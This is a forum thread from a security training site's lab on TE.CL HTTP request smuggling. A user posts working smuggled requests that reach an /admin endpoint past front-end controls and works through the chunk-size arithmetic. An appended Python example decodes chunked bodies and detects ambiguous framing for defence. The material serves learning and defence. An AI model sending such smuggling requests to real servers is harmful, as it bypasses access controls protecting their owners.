Burp Suite User Forum


Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Luc | Last updated: Oct 05, 2020 03:06PM UTC

Good morning,

The following request in the provided solution did work for me but I don't understand how it's calculated.

POST / HTTP/1.1
Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
\r\n
\r\n

Those two ending "\r\n" and the correct length "60" are required, or else I get "Read timeout after 10000ms". My question is how the number 60 is calculated. It's supposed to be the body content length of the smuggled request. Why is it not 22 (first line) + 49 (second line) + 20 (third line) + 2 (fourth blank line) + 5 (line of "x=1") + 1 (number 0 without trailing \r\n) = 99?

POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters)
Content-Type: application/x-www-form-urlencoded -> 47 characters + 2 ending \r\n (49 characters)
Content-Length: 15 -> 18 characters + 2 ending \r\n (20 characters)
(blank line) -> \r\n (2 characters)
x=1 -> 3 + \r\n (5 characters)
0 -> 1 + \r\n (3 characters)
\r\n -> \r\n (2 characters)
\r\n -> \r\n (2 characters)

And I don't understand how "Content-Length: 15" is calculated. I thought it should be x=1\r\n (5 characters) + 0 (1 character) = 6 characters.

Would you please help to explain why my calculations are wrong? Thanks in advance for your help.

Regards,
Luc

Uthman, PortSwigger Agent | Last updated: Oct 05, 2020 04:02PM UTC

Hi Luc,

Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focussing on expanding and refining our public content. The post will remain up so anyone in the community is free to reply.

Have you taken a look at the learning materials and James' research on the topic?

- https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
- https://portswigger.net/web-security/request-smuggling

Luc | Last updated: Oct 05, 2020 05:06PM UTC

Yes, I've seen both learning materials and that is the reason I'm interested in this area and want to explore more. Those two links don't help with this specific question. I would greatly appreciate it if you or another user could help to answer the question, since it sounds straightforward but I just don't get it.

Luc | Last updated: Oct 05, 2020 05:17PM UTC

Sorry, I missed something. Chunk size is in bytes (expressed in hexadecimal), so 60 actually means 96. So it's 22 (first line) + 49 (second line) + 20 (third line) + 2 (fourth blank line) + 3 (line of "x=1" without ending \r\n). However, I still don't understand why the smuggled request has a length of 15 instead of 6. Could someone help to explain? Thanks.

Luc | Last updated: Oct 05, 2020 05:40PM UTC

Hi Uthman,

The second Content-Length doesn't matter, thus it doesn't seem to be calculated correctly. The following request got the same expected result:

POST / HTTP/1.1
Host: ac641f531f428c008065478d00f200ed.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

5f
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

x=1
0
\r\n
\r\n

As we can tell, I can change the Content-Length from 15 to 6. Should the example be updated to have a Content-Length of 6 instead of 15 to reduce confusion for all users? Please advise.

Thanks,
Luc
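A worked version of the arithmetic discussed in this thread, added here as an example and not code from the forum, from PortSwigger or from the Academy solution. It joins the smuggled lines quoted above with CRLF, reports the chunk size as a hexadecimal byte count (96 = 0x60, or 95 = 0x5f with "Content-Length: 6"), decodes the chunked body strictly so that a missing final CRLF is rejected, and shows what a parser that honours only Content-Length: 4 takes as the body. The request lines are the ones quoted in the posts; the helper names are assumptions of this example.

```python
"""Chunk-size arithmetic for the TE.CL request quoted in this thread."""

CRLF = b"\r\n"

# The smuggled request lines from the thread, reconstructed here as bytes.
SMUGGLED_LINES = [
    b"POST /admin HTTP/1.1",
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: 15",
    b"",
    b"x=1",
]


def chunk_payload(lines):
    """Join the lines with CRLF. The final line has no trailing CRLF: the
    CRLF after chunk data belongs to the chunk framing, not to the payload,
    which is why 'x=1' counts as 3 bytes rather than 5."""
    return CRLF.join(lines)


def chunk_size_hex(payload):
    """Chunk sizes are hexadecimal byte counts (RFC 7230 section 4.1)."""
    return format(len(payload), "x")


def build_chunked_body(payload):
    """Encode one chunk followed by the terminating zero-length chunk."""
    return (chunk_size_hex(payload).encode() + CRLF
            + payload + CRLF
            + b"0" + CRLF
            + CRLF)


def decode_chunked(body):
    """Strict chunked decoder. Returns the list of chunk payloads and raises
    ValueError on any framing error, including a missing CRLF after the
    last chunk (the 'Read timeout' symptom from the thread)."""
    chunks = []
    pos = 0
    while True:
        end = body.find(CRLF, pos)
        if end < 0:
            raise ValueError("missing CRLF after chunk-size line")
        size_field = body[pos:end].split(b";")[0].strip()  # drop chunk extensions
        size = int(size_field, 16)
        pos = end + 2
        if size == 0:
            # No trailer fields here: the body must end with exactly one more CRLF.
            if body[pos:pos + 2] != CRLF:
                raise ValueError("missing CRLF after last-chunk")
            return chunks
        data = body[pos:pos + size]
        if len(data) != size:
            raise ValueError("chunk data shorter than declared size")
        pos += size
        if body[pos:pos + 2] != CRLF:
            raise ValueError("chunk data not followed by CRLF")
        pos += 2
        chunks.append(data)


def is_well_formed_chunked(body):
    """Boolean wrapper around decode_chunked for quick checks."""
    try:
        decode_chunked(body)
        return True
    except ValueError:
        return False


def content_length_view(body, content_length):
    """Split the body the way a server that honours Content-Length and
    ignores Transfer-Encoding does: (bytes it treats as the body, leftover
    bytes that stay on the connection)."""
    return body[:content_length], body[content_length:]


def has_ambiguous_framing(headers):
    """A request carrying both Content-Length and Transfer-Encoding is
    ambiguously framed; RFC 7230 section 3.3.3 tells a server to reject it
    or to honour Transfer-Encoding and discard Content-Length."""
    names = {name.lower() for name in headers}
    return "content-length" in names and "transfer-encoding" in names


if __name__ == "__main__":
    payload = chunk_payload(SMUGGLED_LINES)
    print(len(payload), chunk_size_hex(payload))      # 96 60
    body = build_chunked_body(payload)
    print(decode_chunked(body) == [payload])          # True
    consumed, leftover = content_length_view(body, 4)
    print(consumed)                                   # b'60\r\n'
    print(has_ambiguous_framing({"Content-Length": "4",
                                 "Transfer-Encoding": "chunked"}))  # True
```

The defensive point the arithmetic illustrates: the front end in the lab reads exactly four body bytes (`60\r\n`) and forwards everything after them, while a chunked-aware back end reads 0x60 bytes of data. A front end that rejects requests where `has_ambiguous_framing` is true, or that normalises to a single framing header before forwarding, removes the disagreement.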
